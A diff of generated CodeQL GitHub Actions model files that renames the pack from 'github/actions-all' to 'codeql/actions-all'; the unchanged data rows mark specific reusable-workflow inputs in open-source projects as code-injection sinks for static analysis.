a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index 5f4a4a09cd00..053e863a5130 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index 4cadb751d755..88d66d40826d 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index 1257c67c1807..534936eab1f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index f0daee8757ea..6d4259a45e52 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index 85d3b564a78c..35d6bbd1b7bc 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index 01bda56c9a9b..9dd893ca3b2a 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index 4c9e9b1dc8fc..10dfdc0c63ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 30e54f94fc17..fdc59aeb23da 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index bb0c172bf0e1..4b520ea39546 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index 3a5ad21b22af..f8630968c45f 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index c161072bd3d8..4cf11f56fdf6 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index 0362312f27a1..44ad4f730764 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index 2ae5aab3b2cd..4d7af6469019 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index e2c8ae625c20..0f525b146074 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index 13461b602054..fc96f1497e01 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index 88e02dd04c45..a57f0a860696 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index 2f368497f013..ce86ebf49116 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index 64f3c2085402..05212ab32641 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 9c2d7a421db8..6d40d72d019a 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index 1410fd6fbe98..f5ac697360b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index eca441b608a2..95140465bfc4 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index 2868aecd064e..30cf3f54a2fa 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index 0aa2d1c596c7..90937f50a3f1 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index 02fe1b2055f6..ec6a7385187c 100644 --- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index 9f6401ec03e9..5079e80e7610 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index 373b507f2f30..ccaf2628951d 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 9b68b660586b..56344ff35b64 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index ddce9773100d..f2b4cd4eff31 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index 3aa599e00d70..f38f0d43c4c8 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] 
@@ -8,7 +8,7 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml
index 4ff3377e6ebd..85e61e866dc0 100644
--- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml
index 577ffa78d821..9f984f488f7d 100644
--- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml
index 99ff06a4aee3..f13f9b871142 100644
--- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml
index 5241bc1bcb1e..b021069745f9 100644
--- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml
index 66221185cbdb..dae9a68727e3 100644
--- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml
index eb5207528d4f..4ea3849560dc 100644
--- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml
index 1337b0e76ec4..ff4b4ccf353e 100644
--- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml
index 1d8b8f0e9f1b..d3649a5ebf33 100644
--- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml
index 4eaa610a3a2b..22ff2d5a29be 100644
--- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml
index a62139e12c47..f151d0a2c20f 100644
--- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml
index 2f3f85fe424c..e08f9de22977 100644
--- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml
index f39a027eda7c..fc009bce95a9 100644
--- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml
index 5a0b692e4e18..5e5870c64c7e 100644
--- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml
index ae902cb95ab6..2262cf5115f4 100644
--- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml
index 78379dd7796c..a18ef96e87e7 100644
--- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml
index 0eeed9a1f17e..2ea0842c72bc 100644
--- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml
index 3ab501e1b1f3..65f027175b21 100644
--- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml
index caa0ee6d7cb1..14c3c8378c6d 100644
--- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml
index b660b0bc4ec3..c1a51cefdcdb 100644
--- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"]
